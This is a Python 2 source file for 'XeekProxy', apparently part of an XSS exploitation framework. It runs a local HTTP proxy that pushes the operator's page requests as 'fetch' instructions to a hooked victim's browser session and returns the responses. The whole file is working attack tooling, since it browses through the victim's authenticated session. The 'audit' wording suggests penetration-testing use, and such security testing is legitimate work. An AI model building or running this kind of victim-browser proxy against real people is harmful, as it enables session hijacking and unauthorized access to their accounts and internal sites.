
import SocketServer
import BaseHTTPServer
import urllib
import urlparse
import sys
import os
import time
import re

from lib.api import *

__version__ = "0.1b"
__author__ = "Emilien \"Trance\" Girault"
__email__ = "trance@segmentationfault.fr | e.girault@sysdream.com"

DEFAULT_ERROR_MESSAGE = """\
<html>
  <head>
    <title>Error</title>
  </head>
  <body>
    <h1>Bad Request</h1>
    <p>Error code %(code)d</p>
    <p>%(message)s</p>
  </body>
  </html>
"""


class ProxyRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
  """HTTP Request Handler based on BaseHTTPServer.BaseHTTPRequestHandler"""

  server_version = "XeekProxy/" + __version__
  error_message_format = DEFAULT_ERROR_MESSAGE
  
  def do_GET(self):
    """Handle a GET request"""
    return self.handle_request("GET")
  
  def do_POST(self):
    """Handle a POST request"""
    return self.handle_request("POST")
  
  def handle_request(self, method):
    """Handle a POST or GET request"""
    
    try:
    
      # Parse the URL
      (scm, netloc, path, params, query, fragment) = urlparse.urlparse(self.path, 'http')
      if scm != 'http' or fragment or not netloc:
        self.send_error(400, "Bad URL %s" % self.path)
        return
      
      # Read the params (if POST)
      post_params = ""
      if method == "POST" and 'content-length' in self.headers:
        l = int(self.headers['content-length'])
        post_params = self.rfile.read(l)
        
        
      url = urlparse.urlunparse((scm, netloc, path, params, query, ''))
      
      # Fetch the URL locally or with the victim, depending on the extension
      if re.search("(/|html?|php|asp|jsp|js|css)$", path):
        self.fetchURLWithVictim(url, method, post_params)
      else:
        self.fetchURLLocally(url, method, post_params)
      
    except Exception, e:
      print e

    return None
    
    
  def fetchURLLocally(self, url, method, post_params):
    """Fetch an URL from the hacker's machine."""
    
    print "Fetching " + url + " locally..."
    
    if post_params == "":
      post_params = None
  
    # Fetch the URL using urllib
    r = urllib.urlopen(url, post_params, {})
    
    # Send status code (200, 404, etc.)
    self.send_response(r.getcode())
    
    # Send headers
    for h, v in r.info().items():
      self.send_header(h, v)
    
    self.end_headers()
    
    # Send the content
    self.wfile.write(r.read())
    
    
    
  def fetchURLWithVictim(self, url, method, post_params):
    """Fetch an URL using the selected Xeek victim."""
      
    # Push the URL to the queue
    instruction_id = self.server.pushURLToQueue(url, method, post_params)
    
    # Wait for a reply
    print "Fetching " + url + " using the victim, waiting for a reply..."
    result = self.server.getURLResult(instruction_id)
  
    if result is None or "error" in result:
      self.send_error(401, "Unable to access this URL. This might be due to the Same Origin Policy restriction enforced on the victim's browser.")
      return None
  
    # Send status code (200, 404, etc.)
    self.send_response(int(result['status']))
    
    # Prepare and send headers. Patch the Content-Length field in order to avoid partial responses due to encoding bugs.
    headers = result["headers"]
    headers = re.sub(re.compile("^Content-Length: [0-9]+\r\n", re.MULTILINE), "Content-Length: "+str(len(result["content"]))+"\r\n", headers)
    
    self.wfile.write(headers)
    self.wfile.write("\r\n"); # Do not use self.end_headers() since there is already a \r\n in the headers
    
    # Send the content
    self.wfile.write(result["content"].encode('utf-8'))

    
class XeekProxyServer(SocketServer.ThreadingMixIn, BaseHTTPServer.HTTPServer):
  """ProxyServer class, extends HTTPServer and ThreadingMixIn"""
  
  WAIT_RESPONSE_DELAY = 0.3
  WAIT_RESPONSE_TIMEOUT = 5.0
  
  def __init__(self, server_address, api_url, audit_name, session_id):
    """Extend HTTPServer constructor."""
    
    ProxyRequestHandler.protocol_version = "HTTP/1.0"
    BaseHTTPServer.HTTPServer.__init__(self, server_address, ProxyRequestHandler)
    
    self.xeek_api = ClientAPI(api_url)
    
    # Resolve the audit id
    audit_id = None
    audits = self.xeek_api.listAudits()
    for audit in audits:
      if audit.name == audit_name:
        audit_id = audit.id
    
    if(audit_id is None):
      print "Invalid audit name."
      sys.exit(1)
    
    self.audit_id = audit_id
    self.session_id = session_id
    
  
  def pushURLToQueue(self, url, method, post_params):
    """Send an URL to the server."""
    exploit_params = {"method": method,
                      "url": url,
                      "params": post_params}
    return self.xeek_api.pushInstructionToQueue(self.audit_id, "fetch", exploit_params, self.session_id).id
    
    
  def getURLResult(self, instruction_id):
    """Get the content of a fetched URL."""
    
    t = 0.0
    while 1:
      l = self.xeek_api.listResults(self.session_id, instruction_id)
      if(len(l) == 1):
        return l[0].data
      else:
        time.sleep(self.WAIT_RESPONSE_DELAY)
        t += self.WAIT_RESPONSE_DELAY
        
        if(t >= self.WAIT_RESPONSE_TIMEOUT):
          print "Timeout!"
          return None

        
def print_help():
  """Print help"""
  
  print
  print "    XeekProxy v%s" % (__version__)
  print "    by %s <%s>" % (__author__, __email__)
  print
  print "Usage: %s server_url audit_name session_id [port]" % os.path.basename(sys.argv[0])
  print
  print "   server_url:  URL used to dialog with XeeK server"
  print "   audit_name:  Name of the audit created on the server"
  print "   session_id:  Session ID of the victim to use as a proxy"
  print "   port:        Local port to listen to (8000 by default)"
  
  
def run():
  """Run the proxy server"""
  
  # Check parameters
  if(len(sys.argv) < 4 or sys.argv[1] == "-h" or sys.argv[1] == "--help"):
    print_help()
    sys.exit(0)
    
  # Rename parameters
  api_url = sys.argv[1]
  audit_name = sys.argv[2]
  session_id = sys.argv[3]
  
  # Port ?
  if(len(sys.argv) == 5):
    port = int(sys.argv[4])
  else:
    port = 8000
  

  try:
    server_address = ('127.0.0.1', port)
    httpd = XeekProxyServer(server_address, api_url, audit_name, session_id)
    sa = httpd.socket.getsockname()
    
    print "Serving HTTP on", sa[0], "port", sa[1], "..."
    print "Press Ctrl-C to exit."
    httpd.serve_forever()
    
  except KeyboardInterrupt, e:
    print "Exiting."
    sys.exit(0)


